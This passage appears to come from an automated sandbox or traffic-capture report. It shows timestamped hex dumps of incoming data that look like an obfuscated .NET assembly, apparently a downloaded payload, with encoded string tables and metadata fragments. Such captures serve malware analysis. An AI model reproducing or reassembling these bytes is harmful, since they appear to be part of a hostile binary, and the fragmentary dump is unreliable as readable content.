2022-02-22 14:30:32 UTC 72 IN Data Raw: fe 0c 05 00 58 4a 9a a2 fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 46 fc ff ff fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a 75 1c 00 00 01 a2 fe 0c 03 00 fe 0c 01 00 20 01 00 00 00 59 20 05 00 00 00 9c 38 0a fc ff ff fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a a2 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 fe 0c 01 00 20 01 00 00 00 59 fe 0e 01 00 38 cb fb ff ff fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 08 00 fe 0c 01 00 fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a 9a a2 fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 84 fb ff ff fe 0c 08 00 fe 0c Data Ascii: XJ X X8F Y Yu Y 8XJ Y X Y8 XJ X X8

2022-02-22 14:30:32 UTC 76 IN Data Raw: 0c 04 00 3d 05 00 00 00 38 c2 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 04 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 04 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 fe 0c 0b 00 fe 0c 00 00 fe 0c 03 00 fe 0c 09 00 fe 0c 0a 00 58 4a 9a a2 fe 0c 08 00 fe 0c 00 00 20 05 00 00 00 9c fe 0c 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 d2 fe ff ff fe 0c 0b 00 fe 0c 00 00 20 01 00 00 00 59 9a 74 09 00 00 02 7e 2a 00 00 04 fe 0c 09 00 fe 0c 0a 00 58 4a 97 29 1e 00 00 11 fe 0c 00 00 20 01 00 00 00 59 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 88 fe ff ff 00 38 82 fe ff ff fe 0c 09 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0d 00 5a 58 fe 0e 09 00 Data Ascii: =88+ ? =888XJ X X8 Yt~*XJ) Y X88((%~a Y ZX

2022-02-22 14:30:32 UTC 80 IN Data Raw: 00 01 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 55 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd 53 f1 ff ff fe 0c 0e 00 fe 0c 27 00 fe 0c 10 00 58 4a fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a a2 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 dd 14 f1 ff ff fe 0c 2c 00 fe 0c 2a 00 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 02 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 58 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd c7 f0 ff ff fe 0c 2c 00 fe 0c 2a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a 74 05 00 00 01 7e 2b 00 00 Data Ascii: ~+'XJ)U* Y*' X'S'XJ* Y' X'* Y*,* *~+'XJ)* X*' X',* Y * Y* Yt~+

2022-02-22 14:30:32 UTC 84 IN Data Raw: fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 22 00 fe 0c 19 00 7a 00 38 51 03 00 00 00 fe 0c 0d 00 fe 0c 0d 00 fe 0c 15 00 fe 0c 14 00 94 58 fe 0c 10 00 58 4a 58 fe 0c 10 00 58 4a fe 0e 11 00 20 ff ff ff ff fe 0c 12 00 3b 1e 03 00 00 fe 0c 1d 00 fe 0c 12 00 3b ff 02 00 00 fe 0c 12 00 fe 0c 0d 00 59 fe 0e 2b 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 2b 00 fe 0e 02 00 20 00 00 00 00 fe 0e 13 00 20 04 00 00 00 fe 0e 20 00 fe 0c 13 00 fe 0c 20 00 58 20 02 00 00 00 5b fe 0e 26 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 fe 0c 10 00 58 4a fe 0e 21 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 08 00 Data Ascii: X8 "z8QXXJXXJ ;;Y+ ; Y+ X [& X& ZXXJ! X& ZX

2022-02-22 14:30:32 UTC 88 IN Data Raw: ff 00 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 9a 2a 00 00 00 13 30 07 00 0e 17 00 00 61 00 00 11 fe 0d 04 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 07 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 0e 00 20 04 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 04 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 04 00 00 00 8d 03 00 00 01 fe 0e 06 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 15 00 fe 0e 10 00 20 06 00 00 00 8d 03 00 00 01 25 fe 0e 01 00 fe 0e 09 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 08 00 fe 0e 0c 00 20 04 00 00 00 8d 04 00 00 01 25 fe 0e 0f 00 fe 0e 13 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 12 00 fe 0c 0c 00 20 00 00 00 00 8f 04 00 00 01 fe 09 00 00 55 fe 0c 12 00 20 00 00 00 00 fe 09 01 00 a2 7f 69 00 00 04 fe 0e 0a 00 fe 0c 0a 00 Data Ascii: Y*0a% TF Z Z % % % % U i

2022-02-22 14:30:32 UTC 92 IN Data Raw: 00 58 fe 0e 00 00 38 7c f0 ff ff fe 0c 02 00 fe 0c 05 00 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 67 00 00 11 a2 fe 0c 05 00 20 01 00 00 00 58 fe 0e 05 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 2f f0 ff ff fe 0c 02 00 fe 0c 05 00 20 01 00 00 00 59 20 02 00 00 00 9c fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4c 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 63 00 00 11 df fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 c9 ef ff ff fe 0c 02 00 fe 0c 05 00 20 02 00 00 00 59 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 20 02 00 00 00 59 fe 0c 13 00 fe 0c 05 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 13 00 fe 0c 05 00 20 01 Data Ascii: X8| ~-XJ)g X X8/ Y Y YL~-XJ)c X8 Y Y YM

2022-02-22 14:30:32 UTC 96 IN Data Raw: 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 37 1a 00 00 20 1a 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1a 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 d7 19 00 00 38 fe 0c 00 00 38 f9 0c 00 00 20 1c 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1c 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 6c 1a 00 00 38 d3 0c 00 00 38 ce 0c 00 00 20 2b 00 00 00 fe 0c 1c 00 3f 06 02 00 00 20 2b 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 b4 1f 00 00 20 24 00 00 00 fe 0c 1c 00 3f fc 00 00 00 20 24 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 18 1d 00 00 20 20 00 00 00 fe 0c 1c 00 3f 64 00 00 00 20 20 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 45 1b 00 00 20 1e 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1e 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 9e 1a 00 00 38 45 0c 00 00 20 1f 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 Data Ascii: =87 ? =888 ? =8l88 +? +=8 $? $=8 ?d =8E ? =88E ?

2022-02-22 14:30:32 UTC 100 IN Data Raw: 0e 0c 00 20 00 00 00 00 fe 0e 09 00 fe 0c 24 00 fe 0c 24 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0e 02 00 fe 0c 2d 00 fe 0c 21 00 fe 0c 10 00 a2 fe 0c 22 00 fe 0c 21 00 fe 0c 16 00 9e fe 0c 27 00 fe 0c 21 00 20 00 00 00 00 9e fe 0c 21 00 20 01 00 00 00 58 fe 0e 21 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 10 00 7a 00 00 dd af ea ff ff fe 0c 24 00 fe 0c 02 00 fe 0c 03 00 58 4a 58 fe 0e 02 00 dd 97 ea ff ff 00 dd 91 ea ff ff fe 0c 05 00 fe 0c 09 00 8f 04 00 00 01 e0 fe 0c 02 00 fe 0c 03 00 58 4a 54 fe 0c 0f 00 fe 0c 09 00 20 00 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 49 ea ff ff fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 Data Ascii: $$X XXJX-!"!'! ! X!8 z$XJXXJT X XI Y Y

2022-02-22 14:30:32 UTC 104 IN Data Raw: fe 0c 0b 00 fe 0c 02 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 15 00 fe 0c 09 00 14 a2 fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 65 da ff ff fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 02 00 fe 0c 03 00 58 4a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0c 24 00 58 fe 0e 02 00 fe 0c 09 00 20 01 00 00 00 59 fe 0e 09 00 dd 00 da ff ff fe 0c 0f 00 fe 0c 09 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 02 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a 74 Data Ascii: XJGT X Xe YJ XJ XXJYZ XXJX$X Y Y Y Yt Yt Yt

2022-02-22 14:30:32 UTC 108 IN Data Raw: 01 e0 fe 0c 15 00 fe 0c 09 00 20 06 00 00 00 59 9a 74 11 00 00 02 fe 0c 05 00 fe 0c 09 00 20 05 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 05 00 fe 0c 09 00 20 04 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 11 00 00 1b fe 0c 05 00 fe 0c 09 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 1a 00 fe 0c 0b 00 fe 0c 13 00 7e 30 00 00 04 fe 0c 29 00 fe 0c 09 00 20 01 00 00 00 59 94 97 29 82 00 00 11 7e 30 00 00 04 fe 0c 02 00 fe 0c 03 00 58 4a 97 29 86 00 00 11 54 fe 0c 09 00 20 05 00 00 00 59 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 36 c9 ff ff fe 0c 0f 00 fe 0c 09 00 20 02 00 00 00 59 20 00 00 00 00 9c fe Data Ascii: Yt YM YJ Yt YJ Y YJ~0) Y)~0XJ)T Y X6 Y


Direction Data


2022-02-22 14:30:32 UTC 112 IN Data Raw: 0e 0c 00 fe 0c 0d 00 fe 0c 0c 00 58 20 02 00 00 00 5b fe 0e 16 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 fe 0c 03 00 58 4a fe 0e 19 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 03 00 58 4a fe 0e 01 00 fe 0c 11 00 fe 0c 19 00 fe 0c 01 00 58 3c 16 00 00 00 fe 0c 19 00 fe 0c 11 00 3d 1c 00 00 00 fe 0c 16 00 38 26 00 00 00 fe 0c 16 00 20 01 00 00 00 58 fe 0e 0d 00 38 6e ff ff ff fe 0c 16 00 20 01 00 00 00 59 fe 0e 0c 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 03 00 58 4a fe 0e 20 00 fe 0c 20 00 fe 0e 17 00 20 ff ff ff ff fe 0c 17 00 40 0e 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 06 00 7a 00 fe 0c 24 00 fe 0c 17 00 Data Ascii: X [$ 5 X ZXXJ$ 5 X ZX XXJX<=8& X8n Y8[$ 5 X ZX XXJ @ z$

2022-02-22 14:30:32 UTC 116 IN Data Raw: 00 00 00 fe 06 a4 00 00 06 9b 7e 2b 00 00 04 20 01 00 00 00 fe 06 a5 00 00 06 9b 7e 2b 00 00 04 20 02 00 00 00 fe 06 a6 00 00 06 9b 7e 2b 00 00 04 20 03 00 00 00 fe 06 a7 00 00 06 9b 7e 2b 00 00 04 20 04 00 00 00 fe 06 a8 00 00 06 9b 7e 2b 00 00 04 20 05 00 00 00 fe 06 a9 00 00 06 9b 7e 2b 00 00 04 20 06 00 00 00 fe 06 aa 00 00 06 9b 7e 2b 00 00 04 20 07 00 00 00 fe 06 ab 00 00 06 9b 7e 2b 00 00 04 20 08 00 00 00 fe 06 ac 00 00 06 9b 7e 2b 00 00 04 20 09 00 00 00 fe 06 ad 00 00 06 9b 7e 2b 00 00 04 20 0a 00 00 00 fe 06 ae 00 00 06 9b 7e 2b 00 00 04 20 0b 00 00 00 fe 06 af 00 00 06 9b 7e 2b 00 00 04 20 0c 00 00 00 fe 06 b0 00 00 06 9b 7e 2b 00 00 04 20 0d 00 00 00 fe 06 b1 00 00 06 9b 7e 2b 00 00 04 20 0e 00 00 00 fe 06 b2 00 00 06 9b 2a 5a fe 09 00 00 fe Data Ascii: ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ *Z

2022-02-22 14:30:32 UTC 120 IN Data Raw: fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 14 00 00 01 7e 42 00 00 04 fe 0c 0c 00 fe 0c 10 00 58 4a 97 29 97 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 4a f9 ff ff fe 0c 0d 00 fe 0c 04 00 20 02 00 00 00 59 20 05 00 00 00 9c fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 9a 74 20 00 00 01 fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 3f 00 00 01 7e 42 00 00 04 fe 0c 0c 00 fe 0c 10 00 58 4a 97 29 98 00 00 11 a2 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 c9 f8 ff ff fe 0c 12 00 fe 0c 0c 00 fe 0c 10 00 58 4a fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 38 8a f8 ff ff fe 0c Data Ascii: Yt~BXJ) X8J Y Y Yt Yt?~BXJ) Y X8XJ Y X Y8

2022-02-22 14:30:32 UTC 124 IN Data Raw: 45 00 00 04 20 00 00 00 00 fe 06 36 01 00 06 9b 7e 45 00 00 04 20 01 00 00 00 fe 06 37 01 00 06 9b 2a 2a fe 09 00 00 28 6b 00 00 0a 2a 00 00 00 13 30 03 00 21 00 00 00 00 00 00 00 20 01 00 00 00 8d 06 00 00 01 80 46 00 00 04 7e 46 00 00 04 20 00 00 00 00 fe 06 39 01 00 06 9b 2a 1a 7e 44 00 00 04 2a 13 30 03 00 21 00 00 00 00 00 00 00 20 01 00 00 00 8d 06 00 00 01 80 47 00 00 04 7e 47 00 00 04 20 00 00 00 00 fe 06 3b 01 00 06 9b 2a 00 00 00 13 30 05 00 f5 02 00 00 a0 00 00 11 fe 0d 02 00 25 20 01 00 00 00 54 46 fe 0e 0c 00 fe 0c 0c 00 20 04 00 00 00 5a fe 0e 0a 00 fe 0c 0c 00 20 08 00 00 00 5a fe 0e 00 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 06 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 09 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 04 00 00 Data Ascii: E 6~E 7**(k*0! F~F 9*~D*0! G~G ;*0% TF Z Z

2022-02-22 14:30:32 UTC 128 IN Data Raw: 1d 1d 00 00 00 ff ff ff ff ff ff ff ff 01 01 02 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 04 00 00 00 04 04 00 00 00 05 00 00 00 70 70 00 00 00 06 00 00 00 04 04 00 00 00 07 00 00 00 01 01 00 00 00 08 00 00 00 03 03 00 00 00 09 00 00 00 03 03 00 00 00 0a 00 00 00 01 01 00 00 00 0b 00 00 00 02 02 00 00 00 0c 00 00 00 02 02 00 00 00 01 01 05 00 00 00 a5 a5 00 00 00 06 00 00 00 04 04 00 00 00 0d 00 00 00 03 03 00 00 00 0e 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 10 00 00 00 26 26 00 00 00 00 00 00 a5 a5 00 00 00 01 11 00 00 00 fe fe 00 00 00 06 00 00 00 04 04 00 00 00 12 13 14 00 00 00 00 00 00 00 00 15 0e 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 16 00 00 00 fa fa 00 00 00 00 00 00 e7 e7 00 00 00 06 00 00 00 04 04 00 00 00 17 00 Data Ascii: pp&&

2022-02-22 14:30:32 UTC 132 IN Data Raw: 00 03 03 00 00 00 13 00 00 00 c2 c2 00 00 00 01 02 00 00 00 00 00 00 00 00 04 00 00 00 03 03 00 00 00 13 00 00 00 c2 c2 00 00 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 02 02 00 00 00 02 03 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 05 5d 00 00 00 00 00 00 9a 9a 00 00 00 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 6f 5d 6e 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 31 5d 38 5d 33 5d 2f 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 38 5d 36 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d Data Ascii: ]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]o]n]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]1]8]3]/]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]8]6]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]

2022-02-22 14:30:32 UTC 136 IN Data Raw: 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 0b 65 0a 65 26 65 01 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 04 65 00 65 17 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 0d 65 31 65 11 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 00 65 22 65 65 65 07 01 05 00 00 00 21 21 00 00 00 02 00 00 00 01 01 00 00 00 06 b0 00 00 00 00 00 00 20 20 00 00 00 e7 b0 c7 b0 e5 b0 c9 b0 e1 b0 d4 b0 e3 b0 e5 b0 d9 b0 fc b0 fa b0 e1 b0 e4 b0 f7 b0 c4 b0 b0 b0 07 01 05 00 00 00 21 21 00 00 00 08 00 00 00 00 00 00 00 00 09 00 00 00 11 11 00 00 00 02 00 00 00 02 02 00 00 00 03 04 00 00 00 21 21 00 00 00 05 00 00 00 21 21 00 00 00 02 00 Data Ascii: ee)e/e4e1e"eeee&ee2ee0ee4ee6e0ee)e/e4e1e"eeeee2ee0ee4ee6e0ee)e/e4e1e"eee1ee2ee0ee4ee6e0ee)e/e4e1e"eee"eee!! !!!!!!

2022-02-22 14:30:32 UTC 140 IN Data Raw: 1b 00 00 00 4a 00 00 00 1c 1c 00 00 00 02 00 00 00 00 00 00 00 00 2b 2c 00 00 00 04 04 00 00 00 2d 00 00 00 04 04 00 00 00 2e 00 00 14 77 77 14 00 00 00 00 14 6d 6d 14 00 00 34 00 00 00 14 14 00 00 00 35 01 39 00 00 00 04 04 00 00 00 39 00 00 00 06 06 00 00 00 4b 00 00 14 ea ea 14 00 00 00 00 14 9b 9b 14 00 00 4c 00 00 00 0b 0b 00 00 00 23 00 00 00 0a 0a 00 00 00 00 00 00 0d 0d 00 00 00 48 00 00 00 1a 1a 00 00 00 39 00 00 00 06 06 00 00 00 4d 00 00 00 1d 1d 00 00 00 02 00 00 00 00 00 00 00 00 4b 00 00 14 fc fc 14 00 00 00 00 14 ea ea 14 00 00 02 00 00 00 00 00 00 00 00 43 00 00 15 05 05 15 00 00 02 00 00 00 01 01 00 00 00 01 2c 00 00 00 04 04 00 00 00 2d 00 00 00 04 04 00 00 00 2e 00 00 15 60 60 15 00 00 00 00 15 56 56 15 00 00 74 00 00 15 56 56 15 00 00 Data Ascii: J+,-.wwmm4599KL#H9MKC,-.``VVtVV

2022-02-22 14:30:32 UTC 144 IN Data Raw: 23 06 00 01 00 0a 05 0e 00 d3 3a 5a 2a 06 00 1e 00 0a 05 06 00 f5 2e 6c 35 06 00 1d 0d b9 23 06 00 e2 1d b9 23 0e 00 bf 0f 5a 2a 0e 00 5f 16 5a 2a 0e 00 b5 0a 5a 2a 0e 00 de 38 5a 2a 06 00 2c 00 0a 05 06 00 11 0d 6c 35 06 00 45 00 b9 23 16 00 12 0d 6a 2a 06 00 33 18 00 31 06 00 6a 16 00 31 12 00 b8 26 d6 2f 06 00 34 15 6c 35 12 00 84 0f d6 2f 06 00 be 20 ba 30 06 00 b6 15 b9 23 0a 00 3e 35 d9 30 06 00 f5 1c 82 3c 06 00 b0 2a b9 23 06 00 20 3e b9 23 0a 00 b7 36 d9 30 06 00 5e 2d b9 23 06 00 a3 2b b9 23 0a 00 97 04 d9 30 0a 00 23 34 25 05 06 00 ad 15 b9 23 06 00 8b 3a b9 23 06 00 98 1e b9 23 06 00 ea 12 b9 23 06 00 be 2b 65 31 06 00 cf 28 76 26 06 00 78 3f a6 26 12 00 4b 15 36 26 12 00 56 15 36 26 06 00 1c 19 a6 26 06 00 46 17 a6 26 06 00 ba 17 a6 26 06 00 Data Ascii: #:Z*.l5##Z*_Z*Z*8Z*,l5E#j*31j1&/4l5/ 0#>50<*# >#60^-#+#0#4%#:###+e1(v&x?&K6&V6&&F&&

2022-02-22 14:30:32 UTC 148 IN Data Raw: 85 51 00 00 00 00 16 00 9b 29 ef 02 35 00 20 e9 01 00 00 00 11 00 53 06 40 00 35 00 4d e9 01 00 00 00 16 00 16 2a c8 06 35 00 5c e9 01 00 00 00 16 00 90 05 0f 09 35 00 b5 23 00 00 00 00 16 00 51 10 35 00 35 00 6b e9 01 00 00 00 16 00 08 22 15 09 35 00 76 e9 01 00 00 00 16 00 d8 1f 1d 09 35 00 81 e9 01 00 00 00 16 00 ff 1d 25 09 35 00 5a 50 00 00 00 00 16 00 c6 20 23 02 35 00 8c e9 01 00 00 00 16 00 41 0d 2b 09 35 00 97 e9 01 00 00 00 16 00 71 28 32 09 35 00 a2 e9 01 00 00 00 16 00 c3 04 37 09 35 00 b5 e9 01 00 00 00 16 00 e5 2e 3e 09 35 00 0e 23 01 00 00 00 16 00 e0 27 2a 04 35 00 19 23 01 00 00 00 16 00 77 38 30 04 35 00 c0 e9 01 00 00 00 16 00 85 0c 45 09 35 00 c7 e9 01 00 00 00 16 00 a8 3e 4a 09 35 00 d8 e9 01 00 00 00 11 00 d0 3b 40 00 35 00 f3 ea 01 Data Ascii: Q)5 S@5M*5\5#Q55k"5v5%5ZP #5A+5q(2575.>5#'*5#w805E5>J5;@5


Direction Data


2022-02-22 14:30:32 UTC 152 IN Data Raw: 02 a3 00 2b 00 7a 00 c3 00 2b 00 7a 00 c3 00 03 01 96 03 c9 00 f3 01 6f 00 e3 00 2b 00 7a 00 e3 00 fb 01 6f 00 e3 00 1b 00 6f 00 e9 00 f3 01 6f 00 03 01 fb 01 6f 00 03 01 1b 00 6f 00 03 01 2b 00 7a 00 09 01 f3 01 6f 00 20 01 3b 00 6f 00 20 01 2b 00 7a 00 29 01 2b 00 08 0e 49 01 2b 00 08 0e 89 01 8b 00 08 0f a0 01 1b 00 6f 00 c0 01 3b 00 6f 00 e0 01 3b 00 6f 00 00 02 3b 00 6f 00 20 02 3b 00 6f 00 e3 02 9b 00 6f 00 e3 02 1b 00 6f 00 e3 02 fb 01 6f 00 e3 02 33 00 17 0e e3 02 93 00 6f 00 03 03 33 00 ae 0e 03 03 fb 01 6f 00 03 03 2b 00 08 0e 23 03 1b 00 6f 00 23 03 93 00 6f 00 23 03 9b 00 6f 00 23 03 fb 01 6f 00 60 04 2b 00 7a 00 60 04 3b 00 6f 00 80 04 3b 00 6f 00 80 04 2b 00 7a 00 a0 04 3b 00 6f 00 a0 04 2b 00 7a 00 c0 04 2b 00 7a 00 c0 04 3b 00 6f 00 e0 04 Data Ascii: +z+zo+zooooo+zo ;o +z)+I+o;o;o;o ;oooo3o3o+#o#o#o#o`+z`;o;o+z;o+z+z;o

2022-02-22 14:30:32 UTC 156 IN Data Raw: 65 67 69 73 74 72 61 74 69 6f 6e 53 65 72 76 69 63 65 73 54 69 63 6b 73 50 65 72 53 65 63 6f 6e 64 00 41 64 64 4f 70 63 6f 64 65 67 65 74 53 65 63 6f 6e 64 00 73 65 74 53 6f 61 70 41 63 74 69 6f 6e 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 4e 65 75 74 72 61 6c 52 65 73 6f 75 72 63 65 73 46 6f 75 6e 64 00 43 72 65 61 74 65 53 69 67 6e 61 74 75 72 65 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 4e 65 75 74 72 61 6c 52 65 73 6f 75 72 63 65 73 4e 6f 74 46 6f 75 6e 64 00 52 65 6d 6f 76 65 4f 6e 4c 6f 67 4d 65 73 73 61 67 65 67 65 74 49 73 47 65 6e 65 72 69 63 4d 65 74 68 6f 64 00 50 72 65 63 6f 6e 64 69 74 69 6f 6e 49 6e 76 6f 6b 65 4d 65 74 68 6f 64 00 54 61 72 67 65 74 4d 65 74 68 6f 64 00 53 65 74 44 61 74 61 4f 65 6d 50 65 72 69 6f 64 00 57 69 6e 64 6f Data Ascii: egistrationServicesTicksPerSecondAddOpcodegetSecondsetSoapActionResourceManagerNeutralResourcesFoundCreateSignatureResourceManagerNeutralResourcesNotFoundRemoveOnLogMessagegetIsGenericMethodPreconditionInvokeMethodTargetMethodSetDataOemPeriodWindo

